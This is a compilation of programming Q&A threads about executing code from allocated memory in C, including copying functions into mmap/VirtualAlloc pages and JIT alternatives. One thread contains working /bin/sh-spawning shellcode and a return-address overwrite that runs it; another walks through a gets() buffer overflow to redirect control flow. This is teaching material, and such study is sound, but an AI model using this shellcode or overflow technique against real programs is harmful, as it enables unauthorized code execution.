Im trying to copy a function i have to an executable page and run it from there, but i seem to be having some problems.
Here is my code:
#include <stdio.h>
#include <string.h>
#include <windows.h>
int foo()
{
return 4;
}
int goo()
{
return 5;
}
int main()
{
int foosize = (int)&goo-(int)&foo;
char* buf = VirtualAlloc(NULL, foosize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (buf == NULL)
{
printf("Failed\n");
return 1;
}
printf("foo %x goo %x size foo %d\n", &foo, &goo, foosize);
memcpy (buf, (void*)&foo, foosize);
int(*f)() = &foo;
int ret1 = f();
printf("ret 1 %d\n", ret1);
int(*f2)() = (int(*)())&buf;
int ret2 = f2 (); // <-- crashes here
printf("ret2 %d\n", ret2);
return 0;
}
I know some of the code is technically UB ((int)&goo-(int)&foo), but it behaves fine in this case.
My question is why is this not working as expected?
It seems to me i mapped a page as executable and copied an existing function there and im just calling it.
What am i missing?
Would this behave differently on linux with mmap?
Thanks in advance
As everyone has already stated in comments, this is totally undefined behavior and should never really expect to work. However, I played with your code some with the debugger and realized the reason it's not working (at least in Cygwin gcc compiler) is you're creating f2 incorrectly to point to the the address of the pointer storing the allocated memory, namely buf. You want to point to the memory that buf points to. Therefore, your assignment should be
int(*f2)() = (int(*)())buf;
With that change, your code executes for me. But even if it works, it might break again as soon as you make any additional changes to the program.
Well I made a try of your code with MVSC 2008 in debug mode. Compiler happens to create a jmp table with relative offsets, and &foo and &goo are just entries in that table.
So even if you have successfully created an executable buffer and copied the code (much more than was useful...) the relative jump now points to a different location and (in my example) soon fell in a int 3 trap!
TL/DR: as compiler can arrange its code at will, and as many jump use relative offsets, you cannot rely on copying executable code. It is really Undefined Behaviour:
if compiler had been smart enough to just generate something like :
mov AX, 4
ret
it could have worked
if compiler has generated more complicated code with a relative jump it just breaks
Conclusion: you can only copy executable code if you have full control on the binary machine code for example if you used assembly code and know you will have no relocation problem
You need to declare foo and goo as static or will have to disable Incremental Linking.
Incremental linking is used to shorten the linking time when building your applications, the difference between normally and incrementally linked executables is that in incrementally linked ones each function call goes through an extra JMP instruction emitted by the linker.
These JMPs allow the linker to move the functions around in memory without updating all the CALL instructions that reference the function. But it's exactly this JMP that causes problems in your case. Declaring a function as static prevents the linker from creating this extra JMP instruction.
Related
I have the following code which is supposed to drop a shell, however, after I run the code nothing appears to happen. Here is the code that I have. This was taken from the shellcoder's handbook.
`
char shellcode[] =
"\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46"
"\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1"
"\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
int main()
{
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int)shellcode;
}`
I compile it using gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
When I run it the following happens.
The expected result is the following.
Here is the code that produces the above results:
int main()
{
char *name[2];
name[0] = "/bin/sh";
name[1] = 0x0;
execve(name[0], name, 0x0);
exit(0);
}
I am not sure why this is happening. I am using Ubuntu on Windows 10. This might not effect my results but I have disabled ASLR. That might be an issue. I have not tried this on a VM just yet. I wanted to try and figure out why this is not working before I did that. If this is unclear please let me know and I will be happy to clarify any details.
I appreciate all of your help in advance.
--UPDATE--
I was able to get the assembly instructions from the shellcode I provided.
Does anyone see any issues that would cause a shell not to be dropped?
With the help of a colleague we were able to figure out why the shellcode was not executing. The shellcode is fine, the issue was actually an update to the gcc compiler which changes how the prolog/epilog are handled when code executes. When a program starts, the compiler-generated code puts the return address on the stack, but it does so using a new pattern. The executing program no longer uses the return addresses directly by popping it into the instruction pointer (IP). Instead, it pops the stack value into %ecx and then uses the contents at the address %ecx-4 (for 32-bit machines) as the return address. Therefore, the way I was trying to do it was never going to work even with the protections turned off. This behavior only affects main() and not functions called by main. So a simple solution would be to place the contents of main into another function foo() and call foo() from main() as depicted below.
char shellcode[] =
"\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46"
"\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1"
"\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
void foo()
{
int *ret;
ret = (int *)&ret + 4;
(*ret) = (int)shellcode;
}
int main()
{
foo();
}
Here is a question that is related to this answer.
Understanding new gcc prologue
There are couple of things that could go wrong here:
The store of the shell code address is optimized away because it is derived from a stack variable, and nothing reads from the stack afterwards.
The store is optimized away because it is out of bounds.
The offset calculation from the local variable is wrong, so the shellcode address does not overwrite the return address. (This is what happens when I compile your example.)
The execution is redirect, but the shellcode does not run because it is located in the non-executable .data segment. (That would cause the process to terminate with a signal, though).
I'm trying to write a function that copies a function (and ends up modify its assembly) and returns it. This works fine for one level of indirection, but at two I get a segfault.
Here is a minimum (not)working example:
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#define BODY_SIZE 100
int f(void) { return 42; }
int (*G(void))(void) { return f; }
int (*(*H(void))(void))(void) { return G; }
int (*g(void))(void) {
void *r = mmap(0, BODY_SIZE, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
memcpy(r, f, BODY_SIZE);
return r;
}
int (*(*h(void))(void))(void) {
void *r = mmap(0, BODY_SIZE, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
memcpy(r, g, BODY_SIZE);
return r;
}
int main() {
printf("%d\n", f());
printf("%d\n", G()());
printf("%d\n", g()());
printf("%d\n", H()()());
printf("%d\n", h()()()); // This one fails - why?
return 0;
}
I can memcpy into an mmap'ed area once to create a valid function that can be called (g()()). But if I try to apply it again (h()()()) it segfaults. I have confirmed that it correctly creates the copied version of g, but when I execute that version I get a segfault.
Is there some reason why I can't execute code in one mmap'ed area from another mmap'ed area? From exploratory gdb-ing with x/i checks it seems like I can call down successfully, but when I return the function I came from has been erased and replaced with 0s.
How can I get this behaviour to work? Is it even possible?
BIG EDIT:
Many have asked for my rationale as I am obviously doing an XY problem here. That is true and intentional. You see, a little under a month ago this question was posted on the code golf stack exchange. It also got itself a nice bounty for a C/Assembly solution. I gave some idle thought to the problem and realized that by copying a functions body while stubbing out an address with some unique value I could search its memory for that value and replace it with a valid address, thus allowing me to effectively create lambda functions that take a single pointer as an argument. Using this I could get single currying working, but I need the more general currying. Thus my current partial solution is linked here. This is the full code that exhibits the segfault I am trying to avoid. While this is pretty much the definition of a bad idea, I find it entertaining and would like to know if my approach is viable or not. The only thing I'm missing is ability to run a function created from a function, but I can't get that to work.
The code is using relative calls to invoke mmap and memcpy so the copied code ends up calling an invalid location.
You can invoke them through a pointer, e.g.:
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#define BODY_SIZE 100
void* (*mmap_ptr)(void *addr, size_t length, int prot, int flags,
int fd, off_t offset) = mmap;
void* (*memcpy_ptr)(void *dest, const void *src, size_t n) = memcpy;
int f(void) { return 42; }
int (*G(void))(void) { return f; }
int (*(*H(void))(void))(void) { return G; }
int (*g(void))(void) {
void *r = mmap_ptr(0, BODY_SIZE, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
memcpy_ptr(r, f, BODY_SIZE);
return r;
}
int (*(*h(void))(void))(void) {
void *r = mmap_ptr(0, BODY_SIZE, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
memcpy_ptr(r, g, BODY_SIZE);
return r;
}
int main() {
printf("%d\n", f());
printf("%d\n", G()());
printf("%d\n", g()());
printf("%d\n", H()()());
printf("%d\n", h()()()); // This one fails - why?
return 0;
}
I'm trying to write a function that copies a function
I think that is pragmatically not the right approach, unless you know very well machine code for your platform (and then you would not ask the question). Be aware of position independent code (useful because in general mmap(2) would use ASLR and give some "randomness" in the addresses). BTW, genuine self-modifying machine code (i.e. changing some bytes of some existing valid machine code) is today cache and branch-predictor unfriendly and should be avoided in practice.
I suggest two related approaches (choose one of them).
Generate some temporary C file (see also this), e.g. in /tmp/generated.c, then fork a compilation using gcc -Wall -g -O -fPIC /tmp/generated.c -shared -o /tmp/generated.so of it into a plugin, then dlopen(3) (for dynamic loading) that /tmp/generated.so shared object plugin (and probably use dlsym(3) to find function pointers in it...). For more about shared objects, read Drepper's How To Write Shared Libraries paper. Today, you can dlopen many hundreds of thousands of such shared libraries (see my manydl.c example) and C compilers (like recent GCC) are fast enough to compile a few thousand lines of code in a time compatible with interaction (e.g. less than a tenth of second). Generating C code is a widely used practice. In practice you would represent some AST in memory of the generated C code before emitting it.
Use some JIT compilation library, such as GCCJIT, or LLVM, or libjit, or asmjit, etc.... which would generate a function in memory, do the required relocations, and give you some pointer to it.
BTW, instead of coding in C, you might consider using some homoiconic language implementation (such as SBCL for Common Lisp, which compiles to machine code at every REPL interaction, or any dynamically contructed S-expr program representation).
The notions of closures and of callbacks are worthwhile to know. Read SICP and perhaps Lisp In Small Pieces (and of course the Dragon Book, for general compiler culture).
this question was posted on code golf.SE
I updated the 8086 16-bit code-golf answer on the sum-of-args currying question to include commented disassembly.
You might be able to use the same idea in 32-bit code with a stack-args calling convention to make a modified copy of a machine code function that tacks on a push imm32. It wouldn't be fixed-size anymore, though, so you'd need to update the function size in the copied machine code.
In normal calling conventions, the first arg is pushed last, so you can't just append another push imm32 before a fixed-size call target / leave / ret trailer. If writing a pure asm answer, you could use an alternate calling convention where args are pushed in the other order. Or you could have a fixed-size intro, then an ever-growing sequence of push imm32 + call / leave / ret.
The currying function itself could use a register-arg calling convention, even if you want the target function to use i386 System V for example (stack args).
You'd definitely want to simplify by not supporting args wider than 32 bit, so no structs by value, and no double. (Of course you could chain multiple calls to the currying function to build up a larger arg.)
Given the way the new code-golf challenge is written, I guess you'd compare the total number of curried args against the number of args the target "input" function takes.
I don't think there's any chance you can make this work in pure C with just memcpy; you have to modify the machine code.
This question already has answers here:
How to write self-modifying code in x86 assembly
(7 answers)
Closed 6 years ago.
Is there any way to put processor instructions into array, make its memory segment executable and run it as a simple function:
int main()
{
char myarr[13] = {0x90, 0xc3};
(void (*)()) myfunc = (void (*)()) myarr;
myfunc();
return 0;
}
On Unix (these days, that means "everything except Windows and some embedded and mainframe stuff you've probably never heard of") you do this by allocating a whole number of pages with mmap, writing the code into them, and then making them executable with mprotect.
void execute_generated_machine_code(const uint8_t *code, size_t codelen)
{
// in order to manipulate memory protection, we must work with
// whole pages allocated directly from the operating system.
static size_t pagesize;
if (!pagesize) {
pagesize = sysconf(_SC_PAGESIZE);
if (pagesize == (size_t)-1) fatal_perror("getpagesize");
}
// allocate at least enough space for the code + 1 byte
// (so that there will be at least one INT3 - see below),
// rounded up to a multiple of the system page size.
size_t rounded_codesize = ((codelen + 1 + pagesize - 1)
/ pagesize) * pagesize;
void *executable_area = mmap(0, rounded_codesize,
PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_ANONYMOUS,
-1, 0);
if (!executable_area) fatal_perror("mmap");
// at this point, executable_area points to memory that is writable but
// *not* executable. load the code into it.
memcpy(executable_area, code, codelen);
// fill the space at the end with INT3 instructions, to guarantee
// a prompt crash if the generated code runs off the end.
// must change this if generating code for non-x86.
memset(executable_area + codelen, 0xCC, rounded_codesize - codelen);
// make executable_area actually executable (and unwritable)
if (mprotect(executable_area, rounded_codesize, PROT_READ|PROT_EXEC))
fatal_perror("mprotect");
// now we can call it. passing arguments / receiving return values
// is left as an exercise (consult libffi source code for clues).
((void (*)(void)) executable_area)();
munmap(executable_area, rounded_codesize);
}
You can probably see that this code is very nearly the same as the Windows code shown in cherrydt's answer. Only the names and arguments of the system calls are different.
When working with code like this, it is important to know that many modern operating systems will not allow you to have a page of RAM that is simultaneously writable and executable. If I'd written PROT_READ|PROT_WRITE|PROT_EXEC in the call to mmap or mprotect, it would fail. This is called the W^X policy; the acronym stands for Write XOR eXecute. It originates with OpenBSD, and the idea is to make it harder for a buffer-overflow exploit to write code into RAM and then execute it. (It's still possible, the exploit just has to find a way to make an appropriate call to mprotect first.)
Depends on the platform.
For Windows, you can use this code:
// Allocate some memory as readable+writable
// TODO: Check return value for error
LPVOID memPtr = VirtualAlloc(NULL, sizeof(myarr), MEM_COMMIT, PAGE_READWRITE);
// Copy data
memcpy(memPtr, myarr, sizeof(myarr);
// Change memory protection to readable+executable
// Again, TODO: Error checking
DWORD oldProtection; // Not used but required for the function
VirtualProtect(memPtr, sizeof(myarr), PAGE_EXECUTE_READ, &oldProtection);
// Assign and call the function
(void (*)()) myfunc = (void (*)()) memPtr;
myfunc();
// Free the memory
VirtualFree(memPtr, 0, MEM_RELEASE);
This codes assumes a myarr array as in your question's code, and it assumes that sizeof will work on it i.e. it has a directly defined size and is not just a pointer passed from elsewhere. If the latter is the case, you would have to specify the size in another way.
Note that here there are two "simplifications" possible, in case you wonder, but I would advise against them:
1) You could call VirtualAlloc with PAGE_EXECUTE_READWRITE, but this is in general bad practice because it would open an attack vector for unwanted code exeuction.
2) You could call VirtualProtect on &myarr directly, but this would just make a random page in your memory executable which happens to contain your array executable, which is even worse than #1 because there might be other data in this page as well which is now suddenly executable as well.
For Linux, I found this on Google but I don't know much about it.
Very OS-dependent: not all OSes will deliberately (read: without a bug) allow you to execute code in the data segment. DOS will because it runs in Real Mode, Linux can also with the appropriate privileges. I don't know about Windows.
Casting is often undefined and has its own caveats, so some elaboration on that topic here. From C11 standard draft N1570, §J.5.7/1:
A pointer to an object or to void may
be cast to a pointer to a function, allowing data to be invoked as a
function (6.5.4).
(Formatting added.)
So, it's perfectly fine and should work as expected. Of course, you would need to cohere to the ABI's calling convention.
I am trying to perform a buffer overflow to change the call from function A to function B. Is this do-able? I know I will have to figure out how many bytes I have to enter until I have control over the return pointer, and figure out the address of function B. Is it possible to alter it so that after "x==10" we inject function B's address instead of functionA?
Edit:
Is it possible that after fillbuff is called, instead of returning to main, we send it to function B?
Any hints is appreciated.
int fillBuff(int x){
char buff[15];
puts("Enter your name");
gets(buff);
return(x + 5);
}
void functionA(){
puts("I dont want to be here");
exit(0);
}
void functionB(){
printf("I made it!");
exit(0);
}
int main(){
int x;
x = fillbuff(5);
if (x == 10){
functionA();
}
}
Here is an article that shows how to do it: http://insecure.org/stf/smashstack.html.
Compile your program like this: gcc -g -c program.c (with the -g)
and run gdb ./a.out. After, run the command disas main. You should see the disassemble of your code and how it is organized in your memory. You can replace the main function to any other function and see its code.
For more information about disassemble see: https://sourceware.org/gdb/onlinedocs/gdb/Machine-Code.html
Running GDB and disassembling the functions on my computer, the address of functionA() is 0x400679 and the address of functionB() is 40068a. If you see the disassemble code of main function, there is a call to the address 0x400679, and what you want is to change it to 40068a.
Basically, you have to overflow the buffer in function fillBuff and after reaching the space of the pointer, you have to fill with the address. The article shows how to do it.
Buffer overflows are undefined behavior in C. Nothing is guaranteed to occur when you buffer overflow, and as far as I'm aware the language doesn't require a specific memory layout for local variables and/or stored return addresses. In addition to this, some compilers insert stack protectors to make buffer overflow attacks more difficult.
If you want to have defined behavior, you are going to need to look at the assembly produced and figure out what a buffer overflow is going to do. Based on the assembly produced, you can determine the stack layout and the address layout and try to overwrite the return address with a different function's address.
If you're using GCC, the command line option to print out the assembly is -Wa,-al. If you want Intel syntax, add -masm=intel.
I have some C code, that calls a function. I'm compiling this code in visual studio on Windows. Is there a straightforward way to view the return instruction (opcode) and the return adress?
I tried to use the memory window in Visual Studio, but I only see my buffer "blie" and some hexadecimal interpreted memory values. I think CC might be an opcode but I'd like to have a way/software to clearly view the return instruction and the return adress.
#include <stdio.h>
#include <stdlib.h>
int foo(char *);
int main(int argc, char *argv[])
{
if (argc != 1)
return printf("Supply an argument, dude\n");
foo(argv[0]);
return 0;
}
int foo(char *input)
{
unsigned char buffer[600] = "";
printf("Adres: %.8X\n", &buffer);
strcpy(buffer, input);
return 0;
}
The return address is located on the stack memory region (pointed to by the rsp register, assuming your are on x86_64), while the code that performs the function return is located in the code memory region. If you want to see the return address, stop your process on the RET instruction and look at the top of the stack.
If you only want to look at the generated code you can use a disassembler. As you are using Windows you can try the open source x64dbg. Other options exist, such as IDA Pro and you can view a list of others in this question: https://reverseengineering.stackexchange.com/questions/1817/is-there-any-disassembler-to-rival-ida-pro
Documentation excerpt:
The RET instruction transfers program control from the procedure currently being
executed (the called procedure) back to the procedure that called it (the
calling procedure). Transfer of control is accomplished by copying the return
instruction pointer from the stack into the EIP register.
As you can see return address is on the stack so you cannot see that in disassembly.
Regarding finding return instruction - not easy. Most probably you use x86 cpu which is CISC wich has variable length opcodes (in comparison to RISC). This means that in order to find any opcode you must first 'find' all prior to it.
BTW: You can see disassembly of your code in VS.